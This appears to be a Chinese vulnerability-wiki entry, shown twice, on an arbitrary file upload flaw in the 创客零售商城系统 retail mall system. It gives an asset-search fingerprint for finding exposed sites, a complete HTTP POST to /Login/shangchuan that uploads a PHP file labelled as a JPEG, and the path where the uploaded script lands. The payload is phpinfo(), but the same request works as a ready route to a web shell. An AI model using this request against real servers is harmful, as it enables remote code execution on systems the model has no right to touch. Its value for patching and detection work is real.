fofamini-wiki

登录白背景

源码

创客零售商城系统存在文件上传漏洞

一、漏洞简介

创客零售商城系统是一套帮助商家自动匹配客户订单的营销推送工具，实现任何商家和客户都可以免费使用的全自动营销系统！既是为所有客户提供的一套自动匹配互粉的推送工具。创客零售商城系统存在文件上传漏洞

二、影响版本

创客零售商城系统

三、资产测绘

"/Public/Xin/static/css/iconfont.css"

四、漏洞复现

POST /Login/shangchuan HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg
Host: 
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--

/Uploads/txt/2024-07-26/1722005872540.php

原文: https://www.yuque.com/xiaokp7/ocvun2/yg328ilgpavg5gyl

# 创客零售商城系统存在文件上传漏洞

# 一、漏洞简介
创客零售商城系统是一套帮助商家自动匹配客户订单的营销推送工具，实现任何商家和客户都可以免费使用的全自动营销系统！既是为所有客户提供的一套自动匹配互粉的推送工具。创客零售商城系统存在文件上传漏洞

# 二、影响版本
+ 创客零售商城系统

# 三、资产测绘
```plain
"/Public/Xin/static/css/iconfont.css"
```

![1722005907475-5f8af850-064a-466d-8137-653565c69660.png](./img/Oz5ZkZYAEMwWJMQS/1722005907475-5f8af850-064a-466d-8137-653565c69660-508354.png)

# 四、漏洞复现
```plain
POST /Login/shangchuan HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg
Host: 
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
```

![1722005886364-0d5b5517-1cf4-430d-bad2-ef66d2064a61.png](./img/Oz5ZkZYAEMwWJMQS/1722005886364-0d5b5517-1cf4-430d-bad2-ef66d2064a61-770216.png)

```plain
/Uploads/txt/2024-07-26/1722005872540.php
```

![1722005838400-c35d8587-6524-4032-afce-48c49aa55f49.png](./img/Oz5ZkZYAEMwWJMQS/1722005838400-c35d8587-6524-4032-afce-48c49aa55f49-344211.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yg328ilgpavg5gyl>